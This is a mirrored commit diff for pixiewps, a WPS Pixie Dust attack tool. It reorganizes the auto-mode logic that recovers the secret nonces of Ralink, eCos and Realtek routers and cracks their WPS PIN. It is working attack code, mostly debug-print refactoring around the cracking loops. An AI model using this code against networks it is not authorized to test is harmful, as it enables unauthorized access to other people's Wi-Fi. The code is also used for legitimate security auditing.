tyler.durden/pixiewps
1
0
Fork 0
mirror of https://github.com/wiire-a/pixiewps.git synced 2025-07-28 16:24:55 +02:00
Code Issues Packages Projects Releases Wiki Activity

Reorganized auto mode logic

Browse Source
This commit is contained in:
wiire-a 2017-12-20 12:32:40 +01:00
parent 57e3309cfe
commit 0eb8050d6c
2 changed files with 76 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

131
src/pixiewps.c
View File

@ -864,7 +864,10 @@ usage_err:
goto usage_err;
}
DEBUG_PRINT("Debugging enabled");
if (wps->mode_auto) { /* Mode auto, order by probability */
DEBUG_PRINT("Mode is auto (no --mode specified)");
if (!memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN)) {
p_mode[0] = RTL819x;
p_mode[1] = NONE;
@ -884,7 +887,6 @@ usage_err:
}
}
DEBUG_PRINT("Debugging enabled");
DEBUG_PRINT("Modes: %d (%s), %d (%s), %d (%s), %d (%s), %d (%s)",
p_mode[0], p_mode_name[p_mode[0]],
p_mode[1], p_mode_name[p_mode[1]],
@ -1031,9 +1033,9 @@ usage_err:
}
}
/* E-S1 = E-S2 = 0 */
wps->e_s1 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s1) goto memory_err;
wps->e_s2 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s2) goto memory_err;
/* Allocating memory for E-S1 and E-S2 */
wps->e_s1 = malloc(WPS_SECRET_NONCE_LEN); if (!wps->e_s1) goto memory_err;
wps->e_s2 = malloc(WPS_SECRET_NONCE_LEN); if (!wps->e_s2) goto memory_err;
/* Allocating memory for digests */
wps->psk1 = malloc(WPS_HASH_LEN); if (!wps->psk1) goto memory_err;
@ -1044,31 +1046,56 @@ usage_err:
uint_fast8_t k = 0;
uint_fast8_t found_p_mode = NONE;
uint32_t seed;
wps->nonce_seed = 0;
wps->s1_seed = 0;
wps->s2_seed = 0;
/* Attempt special cases first in auto mode */
if (wps->mode_auto) {
/* E-S1 = E-S2 = 0 */
if (memcmp(wps->pke, wps_rtl_pke, WPS_PKEY_LEN)) {
memset(wps->e_s1, 0, WPS_SECRET_NONCE_LEN);
memset(wps->e_s2, 0, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
/* E-S1 = E-S2 = N1 */
if (found_p_mode == NONE) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
}
/* Main loop */
while (!found_p_mode && k < MODE_LEN && p_mode[k] != NONE) {
while (found_p_mode == NONE && k < MODE_LEN && p_mode[k] != NONE) {
/* 1 */
if (p_mode[k] == RT) {
DEBUG_PRINT(" * Mode: %d (%s)", RT, p_mode_name[RT]);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
if (!wps->mode_auto) {
memset(wps->e_s1, 0, WPS_SECRET_NONCE_LEN);
memset(wps->e_s2, 0, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
if (!found_p_mode) {
if (found_p_mode == NONE) {
init_crack_jobs(wps, RT);
wps->nonce_seed = collect_crack_jobs();
if (wps->nonce_seed != 0) {
@ -1089,17 +1116,15 @@ usage_err:
for (int i = 0; i < WPS_NONCE_LEN; i++)
wps->e_s2[i] = ralink_randbyte(&prng);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RT;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
else {
DEBUG_PRINT("Nonce doesn't appear to be generated by this mode, skipping...");
}
}
/* 2 */
@ -1109,8 +1134,7 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_SIMPLE, p_mode_name[ECOS_SIMPLE]);
uint32_t known = wps->e_nonce[0] << 25; /* Reducing entropy from 32 to 25 bits */
uint32_t counter = 0;
seed = 0;
uint32_t seed, counter = 0;
while (counter < 0x02000000) {
int i;
seed = known | counter;
@ -1133,14 +1157,8 @@ usage_err:
}
if (wps->s1_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_SIMPLE;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
@ -1155,19 +1173,14 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", RTL819x, p_mode_name[RTL819x]);
/* E-S1 = E-S2 = E-Nonce - Best case scenario */
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
if (!wps->mode_auto) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
}
if (found_p_mode == NONE) {
@ -1230,10 +1243,10 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_SIMPLEST, p_mode_name[ECOS_SIMPLEST]);
uint32_t index = 0;
uint32_t seed, index = 0;
do {
int i;
seed = index;
uint_fast8_t i;
for (i = 0; i < WPS_NONCE_LEN; i++) {
if (wps->e_nonce[i] != (uint8_t) ecos_rand_simplest(&seed))
break;
@ -1256,14 +1269,8 @@ usage_err:
} while (index != 0xffffffff);
if (wps->nonce_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_SIMPLEST;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}
@ -1278,10 +1285,10 @@ usage_err:
DEBUG_PRINT(" * Mode: %d (%s)", ECOS_KNUTH, p_mode_name[ECOS_KNUTH]);
uint32_t index = 0;
uint32_t seed, index = 0;
do {
int i;
seed = index;
uint_fast8_t i;
for (i = 0; i < WPS_NONCE_LEN; i++) {
if (wps->e_nonce[i] != (uint8_t) ecos_rand_knuth(&seed))
break;
@ -1304,14 +1311,8 @@ usage_err:
} while (index != 0xffffffff);
if (wps->nonce_seed) { /* Seed found */
DEBUG_PRINT("Trying with E-S1: ");
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying with E-S2: ");
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, wps->pin);
if (r == PIN_FOUND) {
DEBUG_PRINT_ATTEMPT(wps->e_s1, wps->e_s2);
if (crack(wps, wps->pin) == PIN_FOUND) {
found_p_mode = ECOS_KNUTH;
DEBUG_PRINT("Pin found (%8s)", wps->pin);
}

11
src/pixiewps.h
View File

@ -49,12 +49,21 @@
#endif
#if defined(DEBUG)
# define DEBUG_PRINT(fmt, args...) do { printf("\n [DEBUG] %s:%d:%s(): " fmt, \
# define DEBUG_PRINT(fmt, args...) do { printf("\n [DEBUG] %s:%4d:%s(): " fmt, \
__FILE__, __LINE__, __func__, ##args); fflush(stdout); } while (0)
# define DEBUG_PRINT_ARRAY(b, l) do { byte_array_print(b, l); fflush(stdout); } while (0)
# define DEBUG_PRINT_ATTEMPT(s, z) \
do { \
printf("\n [DEBUG] %s:%4d:%s(): Trying with E-S1: ", __FILE__, __LINE__, __func__); \
byte_array_print(s, WPS_SECRET_NONCE_LEN); \
printf("\n [DEBUG] %s:%4d:%s(): Trying with E-S1: ", __FILE__, __LINE__, __func__); \
byte_array_print(z, WPS_SECRET_NONCE_LEN); \
fflush(stdout); \
} while (0)
#else
# define DEBUG_PRINT(fmt, args...) do {} while (0)
# define DEBUG_PRINT_ARRAY(b, l) do {} while (0)
# define DEBUG_PRINT_ATTEMPT(s, z) do {} while (0)
#endif
uint_fast8_t p_mode[MODE_LEN] = { 0 };